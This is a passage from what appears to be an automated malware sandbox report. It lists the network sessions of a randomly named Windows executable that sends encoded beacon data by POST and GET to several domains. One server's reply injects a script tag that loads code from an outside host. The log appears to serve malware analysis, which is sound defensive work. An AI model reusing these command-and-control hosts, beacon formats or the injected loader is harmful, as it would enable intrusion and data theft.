                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.top65s.com/awbu/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=gdkuFrJBUYtk0C+rCZ3GWYYnvprHUsvcyl4JnPiM9nUO1RHHa6THeGbeB65IbjJSOHmtIht7kNO+mXLuBa0Fnq9M0idezFSXUkzLut5yxQaNA2IN0uTYm6OMxr/yfJEPddpJjcpfbFNkpUeaJ6nDqzU8dKhAouO1OlAPXo7OqTWsPI2wRcaqGVcM/iR7SHIKL8zuU6BORU8QpK5BBNHWkjTJQ2+/fne09g==
Jul 3, 2024 18:53:03.830629110 CEST | 192 | IN | HTTP/1.1 200 OK
                                            Content-Type: text/html
                                            Content-Length: 96
                                            Cache-Control: max-age=2592000
                                            Data Ascii: <html><body><script src="http://bqtt8ppp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49730 | 156.251.142.107 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 18:53:05.798965931 CEST | 1761 | OUT | POST /awbu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.top65s.com
                                            Origin: http://www.top65s.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.top65s.com/awbu/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Ascii: Z6ZTG=gdkuFrJBUYtk0C+rCZ3GWYYnvprHUsvcyl4JnPiM9nsO1CPHIZrHdGbeJa5YbjJ1OHuyIhQMkP2+m1DuKOYFuq9M9Cdl8lSnUgXPupdyxQaNAzEN9fTYg6OP2r+zbJFYddwyjcthb0tkp1uaZYfDizU6eKgGouKDOjkDXo/0qSusN5HqKIa3XXA7jgBnXzR1FtjVa6wmcVg0pusbIsyPnRm8cDHbTT3/lXLhPYlIAp4dYSAtw2EeXW4Id3kraDC2kI77NrO6uXzdgglbYYVi3LE11l1ok5IAP7tQrzIPnjO4NNTTRUIoefFQABarf8bNdjsn8SXeuAqua1feUW+wFYv0EaxlGMipW0AJEEHfNABICFKiTeRyYng1XR3QpJV0T/MgIjtr+vCidoBEMNNq8zjmqi2sJdrtRdbr+1GVMPAaNfecbpGnAjNYD0iQECBCYvXbIBbBPGW6hFY+ApO8liTT9KGPQKN6ooy/kEKLidVZXov9sj3nu58E5iB7VCmj7ceY+Go5edhaZS9YEjTcYfl5Xkbwwp/dueSbd77oxHt2JNqfCnFj2MZvYBk/2/cucfjpGHPleoGU8o78DuOr9QctS6lQrIvUksguNlh22UL0JF3afXMS0pmYlBs3sriBgA/uPdDFNZD2Go8ha53JRQkTAcLdWcxhvqk6RuX9XM/XAcuAFJu9FYq+6z8+L95MMIJwU/cVG1lyN0alnN0IBGBXJOL/faUjWVqnnb9e7psFOh6ktSe56YfxcMIPBNJpp1h7ndfn/HzxqmsY+5EqKsKnrCf4tyuA9OldRf5ZaiC6ubt9ZvRD4lwo8ahoeIkWyN92ILoDV6tRLTbj5Psl87sGsRHi//pJmFtC9Ganx9jQ1nQRay8osurczJqmNQoWShDr2elG9yXp4j8lO7d0TgnubhKqpusgJpYtRbQF/7nmozqe1866QefQ5WbaKwW4wI1WOkWUPGvRKmMeOL5xLrb+11KIDYpxCsO2hK+CjXNAgM [TRUNCATED]
                                            Jul 3, 2024 18:53:06.325517893 CEST | 192 | IN | HTTP/1.1 200 OK
                                            Content-Type: text/html
                                            Content-Length: 96
                                            Cache-Control: max-age=2592000
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 62 71 74 74 38 70 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <html><body><script src="http://bqtt8ppp.com:301" type="text/javascript"></script></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            8 | 192.168.2.6 | 49731 | 156.251.142.107 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:53:08.338696003 CEST | 476 | OUT | GET /awbu/?3pSl=bXiTJHhxyN&Z6ZTG=tfMOGb5YbIlZgDy8Ct7zXIcDvsDfT/TzyUAekPS/3XIjjxWvcqryNCXIK4stFUxfS1vuJxAN6daHj1X4B8YBs4RT9ktx4jetcwfj0b5V53bLA3sBo/Tvu++c4r3yYfk5ffJC8L0= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.top65s.com
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:53:09.105983973 CEST | 192 | IN | HTTP/1.1 200 OK
                                            Content-Type: text/html
                                            Content-Length: 96
                                            Cache-Control: max-age=2592000
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 62 71 74 74 38 70 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <html><body><script src="http://bqtt8ppp.com:301" type="text/javascript"></script></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            9 | 192.168.2.6 | 49733 | 81.88.57.70 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:53:14.206666946 CEST | 730 | OUT | POST /hfmm/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.videos60.com
                                            Origin: http://www.videos60.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.videos60.com/hfmm/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 41 48 68 76 32 35 6f 4b 6d 32 74 71 39 6b 34 32 62 62 31 6c 4d 4f 77 79 64 6a 38 2f 72 53 78 45 78 62 78 55 44 6a 78 58 6f 78 61 43 36 66 63 73 6c 73 64 6c 72 45 77 42 30 6f 30 4e 79 74 35 6e 33 55 6f 72 52 34 53 7a 47 37 4d 61 43 46 54 74 59 39 62 54 67 30 54 35 44 4d 51 4a 73 35 71 67 77 6f 33 70 49 77 33 58 4d 44 30 41 38 38 6c 63 48 6d 50 50 69 4b 4e 67 74 30 32 39 61 72 62 57 62 56 5a 62 70 6f 6d 37 54 4d 6f 48 55 6b 4c 32 30 62 7a 48 61 37 74 68 79 7a 44 74 73 36 4c 52 2f 30 6f 6a 58 49 57 6f 66 49 4c 30 33 67 54 33 75 78 61 4a 74 47 49 62 52 49 66 67 43 7a 4a 63 2b 53 4f 46 46 64 39 48 69 33 51 6b
                                            Data Ascii: Z6ZTG=AHhv25oKm2tq9k42bb1lMOwydj8/rSxExbxUDjxXoxaC6fcslsdlrEwB0o0Nyt5n3UorR4SzG7MaCFTtY9bTg0T5DMQJs5qgwo3pIw3XMD0A88lcHmPPiKNgt029arbWbVZbpom7TMoHUkL20bzHa7thyzDts6LR/0ojXIWofIL03gT3uxaJtGIbRIfgCzJc+SOFFd9Hi3Qk
                                            Jul 3, 2024 18:53:14.911663055 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:14 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            10 | 192.168.2.6 | 49734 | 81.88.57.70 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:53:16.746392012 CEST | 754 | OUT | POST /hfmm/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.videos60.com
                                            Origin: http://www.videos60.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.videos60.com/hfmm/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 41 48 68 76 32 35 6f 4b 6d 32 74 71 38 46 49 32 63 34 4e 6c 64 2b 77 78 53 44 38 2f 6c 43 78 41 78 61 4e 55 44 68 63 4d 70 45 79 43 36 2b 73 73 6d 70 39 6c 37 55 77 42 67 34 30 49 38 4e 35 61 33 55 30 5a 52 39 71 7a 47 37 6f 61 43 45 6a 74 59 4c 54 51 79 30 54 2f 4b 73 51 4c 69 5a 71 67 77 6f 33 70 49 78 53 66 4d 44 73 41 38 4e 56 63 49 6b 72 4d 38 36 4e 6a 75 30 32 39 65 72 62 6f 62 56 59 34 70 74 44 75 54 4b 6b 48 55 67 44 32 31 4f 48 47 4e 72 74 6e 34 54 43 4f 72 4c 61 37 33 6e 31 54 57 36 79 45 66 76 33 76 2f 32 53 74 79 43 61 71 2f 57 6f 5a 52 4b 48 53 43 54 4a 32 38 53 32 46 58 4b 78 67 74 44 31 48 51 65 52 4a 43 53 55 47 4a 6a 36 5a 44 55 44 32 39 74 52 47 68 51 3d 3d
                                            Data Ascii: Z6ZTG=AHhv25oKm2tq8FI2c4Nld+wxSD8/lCxAxaNUDhcMpEyC6+ssmp9l7UwBg40I8N5a3U0ZR9qzG7oaCEjtYLTQy0T/KsQLiZqgwo3pIxSfMDsA8NVcIkrM86Nju029erbobVY4ptDuTKkHUgD21OHGNrtn4TCOrLa73n1TW6yEfv3v/2StyCaq/WoZRKHSCTJ28S2FXKxgtD1HQeRJCSUGJj6ZDUD29tRGhQ==
                                            Jul 3, 2024 18:53:17.413774967 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:17 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            11 | 192.168.2.6 | 49735 | 81.88.57.70 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:53:19.276115894 CEST | 1767 | OUT | POST /hfmm/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.videos60.com
                                            Origin: http://www.videos60.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.videos60.com/hfmm/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 41 48 68 76 32 35 6f 4b 6d 32 74 71 38 46 49 32 63 34 4e 6c 64 2b 77 78 53 44 38 2f 6c 43 78 41 78 61 4e 55 44 68 63 4d 70 45 71 43 36 49 59 73 30 50 31 6c 34 55 77 42 38 49 30 4a 38 4e 35 4c 33 55 73 64 52 38 58 49 47 35 67 61 41 6e 72 74 4a 4a 37 51 6f 6b 54 2f 49 73 51 49 73 35 72 36 77 6f 48 74 49 78 43 66 4d 44 73 41 38 50 4e 63 4d 32 50 4d 2b 36 4e 67 74 30 32 78 61 72 62 54 62 56 41 47 70 74 47 56 53 36 45 48 58 41 54 32 32 38 66 47 53 62 74 6c 2f 54 43 6f 72 4c 57 67 33 6e 6f 69 57 2b 36 75 66 6f 66 76 70 52 37 4f 6a 78 43 65 6f 67 39 35 4e 62 50 4e 4b 6b 6c 45 37 45 71 6d 61 5a 59 52 30 51 56 5a 59 37 4a 6a 47 45 4a 2f 46 52 79 33 45 41 36 67 31 70 38 69 2b 67 78 75 32 46 61 6d 31 4a 5a 78 30 77 54 6b 32 68 70 2b 79 59 33 77 45 2b 76 48 46 6a 35 43 4e 6d 6e 4e 6d 70 4a 44 65 30 45 6e 66 48 2f 31 6f 4b 48 73 68 4c 59 48 75 6d 35 68 61 73 42 2f 55 6c 6c 41 30 38 66 45 53 55 68 78 75 39 4a 6f 70 65 2f 73 68 51 48 65 6f 53 31 75 4d 47 75 4e 70 37 64 37 6e 79 6a 66 41 2b 57 46 [TRUNCATED]
                                            Data Ascii: Z6ZTG= [TRUNCATED]
                                            Jul 3, 2024 18:53:19.942409039 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:19 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            12 | 192.168.2.6 | 49736 | 81.88.57.70 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:53:21.807485104 CEST | 478 | OUT | GET /hfmm/?Z6ZTG=NFJP1MENpWop4mQ2Zs5LCbA0YH8E+xFn0ZZfcGEEhmCw8vkYycZHoGwi7KU1tu5K8k8nV/m8HY5DGkDycaipo03uFrN3sKGd/4X9PAy/KU8mrpcfTGbb4advs0SPZoPYPk8rppw=&3pSl=bXiTJHhxyN HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.videos60.com
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:53:22.644169092 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:22 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            13 | 192.168.2.6 | 49737 | 203.161.49.220 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:53:27.820875883 CEST | 736 | OUT | POST /ei4t/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.vertilehub.xyz
                                            Origin: http://www.vertilehub.xyz
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.vertilehub.xyz/ei4t/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 69 4c 69 65 53 49 46 5a 30 48 78 65 62 34 38 55 6d 62 71 46 4b 6b 51 69 57 56 67 33 4f 6b 59 72 32 53 66 63 46 53 73 6e 33 6c 79 58 6b 36 73 38 2b 41 39 48 41 71 36 52 6c 5a 6a 4e 61 6f 67 6f 4f 34 34 76 66 43 79 6b 62 6d 39 65 52 4f 4c 41 53 36 56 55 38 43 58 35 41 33 35 34 37 38 57 73 48 37 30 6c 30 57 76 7a 61 70 35 42 52 4b 45 53 4c 37 2f 38 35 5a 37 72 71 6e 6c 73 4f 78 34 79 34 6b 71 5a 5a 72 51 67 45 6b 68 51 73 4d 78 72 4a 50 56 64 64 42 39 70 75 33 31 76 56 31 71 62 70 39 4b 34 51 50 62 74 57 79 71 75 70 41 71 54 34 39 43 73 37 67 2b 4f 44 55 4c 35 45 57 2f 43 43 76 61 56 38 4f 54 31 43 39 53 6d
                                            Data Ascii: Z6ZTG=iLieSIFZ0Hxeb48UmbqFKkQiWVg3OkYr2SfcFSsn3lyXk6s8+A9HAq6RlZjNaogoO44vfCykbm9eROLAS6VU8CX5A35478WsH70l0Wvzap5BRKESL7/85Z7rqnlsOx4y4kqZZrQgEkhQsMxrJPVddB9pu31vV1qbp9K4QPbtWyqupAqT49Cs7g+ODUL5EW/CCvaV8OT1C9Sm
                                            Jul 3, 2024 18:53:28.443382025 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:28 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            14 | 192.168.2.6 | 49738 | 203.161.49.220 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:53:30.354630947 CEST | 760 | OUT | POST /ei4t/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.vertilehub.xyz
                                            Origin: http://www.vertilehub.xyz
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.vertilehub.xyz/ei4t/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 69 4c 69 65 53 49 46 5a 30 48 78 65 55 34 4d 55 67 49 43 46 4d 45 51 68 59 31 67 33 5a 30 59 52 32 53 62 63 46 54 59 33 30 57 57 58 6b 66 6f 38 39 42 39 48 42 71 36 52 75 35 69 48 55 49 67 7a 4f 2f 78 59 66 43 2b 6b 62 6c 42 65 52 50 62 41 53 71 70 56 74 43 58 42 4d 58 35 2b 6b 73 57 73 48 37 30 6c 30 57 72 56 61 70 42 42 52 62 30 53 4b 5a 62 2f 6d 70 37 6f 70 6e 6c 73 4b 78 34 70 34 6b 72 4d 5a 70 30 61 45 6d 5a 51 73 4e 42 72 48 37 4a 53 53 42 39 76 78 48 30 49 47 6c 72 68 68 39 37 61 57 70 62 51 48 51 75 70 6c 57 72 4a 6b 4f 43 50 70 77 65 4d 44 57 54 4c 45 32 2f 6f 41 76 69 56 75 5a 66 53 4e 4a 33 46 50 63 6d 48 44 54 59 67 59 38 4d 69 51 58 72 5a 4a 2f 68 35 76 51 3d 3d
                                            Data Ascii: Z6ZTG=iLieSIFZ0HxeU4MUgICFMEQhY1g3Z0YR2SbcFTY30WWXkfo89B9HBq6Ru5iHUIgzO/xYfC+kblBeRPbASqpVtCXBMX5+ksWsH70l0WrVapBBRb0SKZb/mp7opnlsKx4p4krMZp0aEmZQsNBrH7JSSB9vxH0IGlrhh97aWpbQHQuplWrJkOCPpweMDWTLE2/oAviVuZfSNJ3FPcmHDTYgY8MiQXrZJ/h5vQ==
                                            Jul 3, 2024 18:53:31.023020029 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:30 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html
